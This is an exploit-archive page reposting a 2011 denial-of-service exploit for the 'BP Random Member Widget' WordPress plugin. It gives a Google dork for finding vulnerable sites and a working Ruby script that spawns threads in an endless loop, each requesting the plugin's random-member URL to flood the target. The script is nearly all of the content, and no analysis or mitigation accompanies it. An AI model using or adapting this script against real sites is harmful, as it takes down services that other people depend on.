首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Dos BP Random Member Widget Plugin WordPress
来源:a01001100e@gmail.com 作者:a01001100e 发布时间:2011-10-18  
# Exploit Title: Dos BP Random Member Widget Plugin WordPress
# Google Dork: allinurl: ?random-member
# Author:  a01001100e@gmail.com
# Software Link: http://wordpress.org/extend/plugins/bp-random-member-widget/
# Version: BP Random Member Widget Version: 1.0 
# Tested on: debian 2.6.32-5-686

require 'net/http'
require 'uri'

def fetch(uri_str, limit=0)
	raise ArgumentError, 'HTTP redirect too deep' if limit == 0

	response = Net::HTTP.get_response(URI.parse(uri_str))
	case response
	when Net::HTTPSuccess then 
		print response.code
	when Net::HTTPRedirection then 
		a = response.body
	else
		response.error!
	end
end

print "############################\n"
print "##    DOS random-member   ##\n"
print "##    @author: a01001100e ##\n"
print "############################\n\n\n\n"


while 1 do
	begin
		t = Thread.new{fetch('http://www.sitio.com/members/?random-member')}
		print "."
	rescue Exception => msg
		print "Error: "
		puts msg
	end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Real Networks Netzip Classic 7
·Dolphin <= 7.0.7 (member_menu_
·Apple Safari file:// Arbitrary
·Apple Safari Webkit libxslt Ar
·mpegable Player Build 3 Local
·WM Downloader 3.0.0.9 (.pls) F
·RadLight Pro 3.0(.mp3) Buffer
·MIPS Linux XOR Shellcode Encod
·WordPress 2.0.3 Denial of Serv
·Linux MIPS execve 52 bytes
·BlueZone Desktop .zap file Loc
·G-WAN 2.10.6 / 2.10.7 Remote B
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved